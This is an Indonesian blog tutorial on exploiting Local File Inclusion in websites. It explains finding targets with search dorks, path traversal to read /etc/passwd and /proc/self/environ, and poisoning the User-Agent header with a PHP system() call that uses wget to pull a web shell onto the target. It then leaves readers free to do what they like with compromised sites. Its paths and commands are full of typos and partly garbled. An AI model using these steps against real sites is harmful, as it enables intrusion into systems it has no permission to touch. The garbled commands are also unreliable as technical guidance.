MEMANFAATKAN BUG LFI WEBSITE

MEMANFAATKAN BUG LFI WEBSITE

Konten [Tampil]
lohellooooo :) wassap gaes welcone back to Elite066
 
    Untuk kesempatan kali ini kita akan belajar cara mengimplementasikan bagaimana cara mengexploitasikan pada web target yang rentan terhadap serangan LFI atau biasa di kenal dengan  Local File Inclusion.

hal pertama adalah mencaru target yang betul betul rentan terhadap serangan LFI,cara mencarinya bisa search engine di google,bing,yahoo atau mozilla firefox.
 contoh dalam mencari target dengan cara search enginge dengan kata kunci dork "INDEX.PHP?FILE= SITE.COM kembangin lagi biar dalat yang benar benar vuln

Namun disini saya sudah menemukan sebuah target yang vulm untuk penyerangan LFI tersebut.
contoh http://site.co.li/file-collage.php

  coba ganti target dengan .../ .../ .../
atau contohnya akan seperti ini https://site.co.li/file=.../..../..../ lalu enter
namun ketika saya enter yang saya dapatkan hanta pesan error putih alias blank..
lalu saya mencoba kembali dengan mengganti .../.../..../ dengan etc/passwd > namun blank juga
lalu saya kembali mengganti etc/passwd tersebut dengan menaikan directory dengan contoh https://site.co.li./.../.../etc/passwd :)
daaaan boooommm saya berhasil membaca file etc/passwd tersebut
 
langkah selanjutnya saya akan mengecheck proc/self/environ lali jalankan
https://site.co.li./.../.../etc/passwd/proc/self/environ
daaan booooom untuk kedua kalinya saya berhasil membaca proc/self/environ
namun jika kalian saat mau mengakses proc/self/environ mengalami blank atau error berarti opesional menggunakan *BSD.

langkah selanjutnya mari kita injeksi melicious code dengan meracuni halaman  http hearder kalian biasa menggunakan addon tamper data di mozilla firefox.
caranya kalian buka mozilla firefox lalu masukan URLyang kalian dapat tadi contoh https://site.co.li/?fil=.../.../proc/self/environ
lalu pada user-agent isikan code di bawah ini
<?system (' wged https://site.co.li/shellkalian/shell.txt-O shell.php'),?>
lalu klik submit

okk injeksi malicious code berhasil,jika berhasil directory kalian ada di https://site.ci.li/shellKalian.php

jika shell sudah tertanam selanjutnya terserah kalian mau berbuata apa terhadap website tersebut.
kalo saya biasanya hanya menitipkan file script di dalamnya dan melaporkan bug tersebut pada admin tapi jika admin tidak ada tanggapan atas itu semua yaaaa terserah admin karena disini sata hanya bidang pengamanan website lokal.

Mungkin sekian dulu turoriat LFI kali ini.
Terimakasih semoga bermanfaat bagi kalian.
Sumber tutorial di dapat dari mahaguru ane yang menyuruh ane untuk mempublikasikannya
terimakasih mahaguru














Baca Juga :

Artikel Rekomendasi :

Lebih baru Lebih lama
close